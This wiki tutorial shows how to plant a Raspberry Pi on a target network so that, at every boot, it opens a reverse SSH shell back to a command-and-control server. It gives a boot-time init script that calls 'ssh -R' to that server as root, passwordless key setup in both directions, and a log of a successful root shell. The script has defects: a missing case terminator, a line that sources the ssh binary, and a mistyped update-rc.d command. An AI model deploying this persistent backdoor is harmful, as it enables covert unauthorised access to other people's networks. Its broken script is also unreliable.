RaspberryPi/Reverse SSH

From charlesreid1

This article covers how to get a reverse SSH shell to a Raspberry Pi.

Reverse SSH Shell

How to control the Pi once it is placed on a target network? SSH. But how?

Incoming SSH connections (from a command and control server to the Raspberry Pi) can be blocked by firewalls/security measures.

Reverse SSH is a good alternative: instead of the command and control server connecting to the Raspberry Pi, the Raspberry Pi initiates the connection to the command and control server. This is the same technique used by many backdoor programs.

SSH Command

The command and control server listens for the Pi. When the Pi is online, it calls the ssh command and connects to the remote command and control server.

Normally, when you SSH to a machine, you execute a command like: 

$ ssh user@remoteserver

But if you use the -R flag, it enables a reverse connection to the listener. 

$ ssh  -R  [bind_address:]port:host:hostport  username@remoteserver

Let's ignore bind_address for now.

The port indicates which port on your Raspberry Pi you want to use to get out of the network. Port 22 is the standard SSH port, but this may not be open on the network firewall that your Pi is on. Pick a port you know will be open and use that for port.

host indicates the destination for the tunnel. Once we SSH from the Raspberry Pi into the command and control server, our tunnel is entirely local. So we create a local tunnel from port to hostport. And our host is localhost.

Finally, the username@remoteserver enables us to create an SSH connection to the remote server in the first place.

Reverse SSH on Startup

You can run this command on startup, so that on boot, the Pi will attempt to connect to a remote server if it is available.

First, we'll create a startup service that initiates a reverse SSH connection.

Then, we'll give it a whirl.

Add Reverse SSH Startup Service

The following instructions will walk through how to create a reverse SSH startup service on the Raspberry Pi, so that the Pi will automatically seek out and create a reverse SSH connection on boot, if the remote server can be found.

This is done by editing the Linux partition of the SD card (not the 64 MB boot partition - the ~3 GB Linux partition!) and changing some files in the init.d sequence.

Mount SD Card

First, insert the Raspberry Pi SD card into your laptop and mount the volume.

Create Reverse SSH Service

Now you'll create a reverse SSH service in /sdcard/etc/init.d/. I called mine reverse-ssh. 

#!/bin/sh

### BEGIN INIT INFO
# Provides: new-reverse-ssh
# Required-Start: 
# Required-Stop: 
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: Start reverse ssh at boot time
# Description: Start reverse ssh at boot time. 
### END INIT INFO 

set -e

PARAM=/usr/bin/ssh
if [ -f $PARAM ]; then
    . "$PARAM"
fi

case "${1:-}" in
  stop|reload|restart|force-reload)
        echo "Too bad."

  start)
        echo "Opening reverse shell."
        /usr/bin/ssh -R 2222:localhost:22 root@10.0.0.19;;

  *)
        echo "Usage: ${0:-} {start|stop|status|restart|reload|force-reload}" >&2
        exit 1
        ;;
esac

The line ssh -R 2222:localhost:22 root@10.0.0.19 means that anyone connecting to port 2222 on the remote end will actually connect to localhost port 22, and then that will be the port that is used to connect from the remote end to the client, where this command is being run.

So from the Command and Control server, we'd ssh to port 2222 on the local machine: ssh -p 2222 root@localhost. That'll open our tunnel to the Raspberry Pi.

Updating Startup Sequence on Raspberry Pi

Now it is time to add our startup service to the Pi's onboard update-rc.d - good information here: https://www.debian-administration.org/article/28/Making_scripts_run_at_boot_time_with_Debian

Plug Pi back into the router and start it up. SSH to it.

Now update the rc service, to add our new init.d script to the appropriate runtime levels. 

$ chmod 755 /etc/init.d/reverse-ssh
$ update-rupdate-rc.d reverse-ssh defaults
update-rc.d: using dependency based boot sequencing

Passwordless Login: Raspberry Pi to CnC Server

Now let's creat eSSH keys, so the Pi can remotely SSH to the command and control server without a password.

On our Pi: 

[pi] $ ssh-keygen -t dsa
[pi] $ cat ~/.ssh/id_dsa.pub

and on the command and control server: 

[cncserver] $ vim ~/.ssh/authorized_keys

and paste the contents of the Raspberry Pi's public key.

Passwordless Login: CnC Server to Raspberry Pi

Now let's create SSH keys, so the command and contorol server can remotely access the Pi without a password.

On our command and control server cncserver: 

[cncserver] $ ssh-keygen -t dsa
[cncserver] $ cat .ssh/id_dsa.pub

This is your command and control public key. Now copy and paste this into the Raspberry Pi: 

[pi] $ vim ~/.ssh/authorized_keys

and paste the contents of the public key file from your cncserver. This basically adds your cncserver to the Raspberry Pi's whitelist.


Test Reverse SSH Startup Service

Now we have added the startup service, and put it in the initialization routine. We've added public keys so nobody needs anybody's password.

Let's test it out!

Unplug the Pi, and plug it back in. Give it a moment to boot up.

Once the Pi is ready, it will have looked for your computer's IP address, found it, and SSHed into your computer. So your Pi should now be connecting from port 2222 into your laptop, and then opening a tunnel for the reverse connection in port 22.

Let's ssh into our tunnel. It's really easy - we just connect to localhost, because the connection between localhost and the remote Raspberry Pi has already been made. 

$ ssh root@localhost -p 2222
root@kronos:~# ssh -p 2222 root@localhost
The authenticity of host '[localhost]:2222 ([::1]:2222)' can't be established.
ECDSA key fingerprint is 75:b3:0b:6f:84:d8:44:6b:b6:14:15:20:bd:e9:c8:80.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (ECDSA) to the list of known hosts.
Linux kali 3.12.36 #1 PREEMPT Fri Apr 10 23:27:49 CDT 2015 armv6l

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug  4 05:29:57 2015 from 10.0.0.19
root@kalipi:~#

Boom! There we go! A reverse shell that runs on our Raspberry Pi on boot.

Retrieved from "https://charlesreid1.com/w/index.php?title=RaspberryPi/Reverse_SSH&oldid=7605"